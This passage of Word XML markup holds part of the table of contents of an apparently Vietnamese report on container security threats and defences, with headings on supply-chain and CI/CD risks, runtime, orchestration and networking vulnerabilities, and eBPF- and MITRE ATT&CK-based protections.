                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Giới thiệu chương</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976354 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7EEB7E15" w14:textId="07D73F9E" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1680"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976355" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lỗ hổng bảo mật trong Container Image và chuỗi cung ứng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976355 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B50F653" w14:textId="727BBF46" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1920"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976356" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Rủi ro từ tính chất bắc cầu của các thành phần phụ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976356 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C068A05" w14:textId="2DFA68F3" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1920"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976357" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thao túng quy trình kiểm soát của đường ống CI/CD (Pipeline Compromise)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976357 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="01E9C0AE" w14:textId="5A536503" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1920"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976358" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thách thức từ độ trễ kỹ thuật (Technical Lag) và Quản lý An ninh Mã nguồn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976358 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F918509" w14:textId="420791BC" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1680"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976359" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lỗ hổng bảo mật trong lớp Container Runtime</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976359 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CA9A276" w14:textId="2C231FAA" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1680"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976360" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lỗ hổng bảo mật trong Hệ điều phối</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976360 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62CA3A8B" w14:textId="5E0F064E" w:rsidR="008B11B6" w:rsidRDefault="008B11B6">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1680"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:lang w:val="en-US"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc235976361" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2.5.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Lỗ hổng liên quan đến Kiến trúc Mạng (Container Networking)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976361 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0334D0C0" w14:textId="059EC666"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62" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHƯƠNG 3: Xây dựng GIẢI PHÁP BẢO VỆ CHO HỆ THỐNG CONTAINER</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976362 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C38F898" w14:textId="77E17CB1"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63" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> Giới thiệu chương</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976363 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50A5A474" w14:textId="72AB73F8"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64" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2. Phương pháp luận</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976364 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7DA2E0AF" w14:textId="57DB24BD"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65" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1. Phân tích đối chiếu theo Khung MITRE ATT&amp;CK® cho Container</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976365 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C92A503" w14:textId="366B5E3C"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66" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2. Cơ sở khoa học của công nghệ eBPF (Extended Berkeley Packet Filter)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976366 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50D165A4" w14:textId="4D1C3124"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67" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3. Giải pháp công nghệ giai đoạn Tích hợp và Phân phối (Build &amp; Ship)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976367 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C3520AB" w14:textId="11CC971B"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68" w:history="1">
            <w:r w:rsidRPr="00D4224A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4. Giải pháp công nghệ phòng thủ chủ động tầng Thực thi (Runtime)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc235976368 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00835A55">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
